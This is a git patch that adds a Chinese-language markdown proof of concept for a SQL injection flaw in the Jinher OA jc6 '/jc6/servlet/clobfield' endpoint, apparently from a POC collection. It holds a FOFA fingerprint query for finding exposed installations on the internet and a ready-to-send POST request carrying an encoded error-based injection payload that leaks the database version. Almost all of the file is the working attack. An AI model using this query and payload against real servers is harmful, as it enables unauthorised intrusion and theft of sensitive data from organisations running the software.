From 28621c5c20c9fdca9c69f71b2c98a257a5f5f205 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Tue, 19 Dec 2023 22:15:02 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E9=87=91=E5=92=8COA=20jc6=20clobfield?=
 =?UTF-8?q?=20SQL=E6=B3=A8=E5=85=A5=E6=BC=8F=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 金和OA jc6 clobfield SQL注入漏洞.md | 19 +++++++++++++++++++
 1 file changed, 19 insertions(+)
 create mode 100644 金和OA jc6 clobfield SQL注入漏洞.md

diff --git a/金和OA jc6 clobfield SQL注入漏洞.md b/金和OA jc6 clobfield SQL注入漏洞.md
new file mode 100644
index 0000000..98d46f9
--- /dev/null
+++ b/金和OA jc6 clobfield SQL注入漏洞.md	
@@ -0,0 +1,19 @@
+## 金和OA jc6 clobfield SQL注入漏洞
+金和OA jc6 ljc6/servlet/clobfield接口处存在SQL注入漏洞，攻击者可获取数据中中敏感信息。
+
+## fofa
+```
+
+title="金和协同管理平台" || body="js/PasswordCommon.js" || body="js/PasswordNew.js" || body="Jinher Network" || (body="c6/Jhsoft.Web.login" && body="CloseWindowNoAsk") || header="Path=/jc6" || (body="JC6金和协同管理平台" && body="src=\"/jc6/platform/") || body="window.location = \"JHSoft.MobileApp/Default.htm\";" || banner="Path=/jc6"
+```
+
+## poc
+```
+POST /jc6/servlet/clobfield HTTP/1.1
+host:127.0.0.1
+
+key=readClob&sImgname=filename&sTablename=FC_ATTACH&sKeyname=djbh&sKeyvalue=11%27%2F**%2Fand%2F**%2FCONVERT%28int%2C%40%40version%29%3D1%2F**%2Fand%2F**%2F%27%27%3D%27
+```
+![image](https://github.com/wy876/POC/assets/139549762/09333181-7373-4930-ad60-91e168709564)
+
+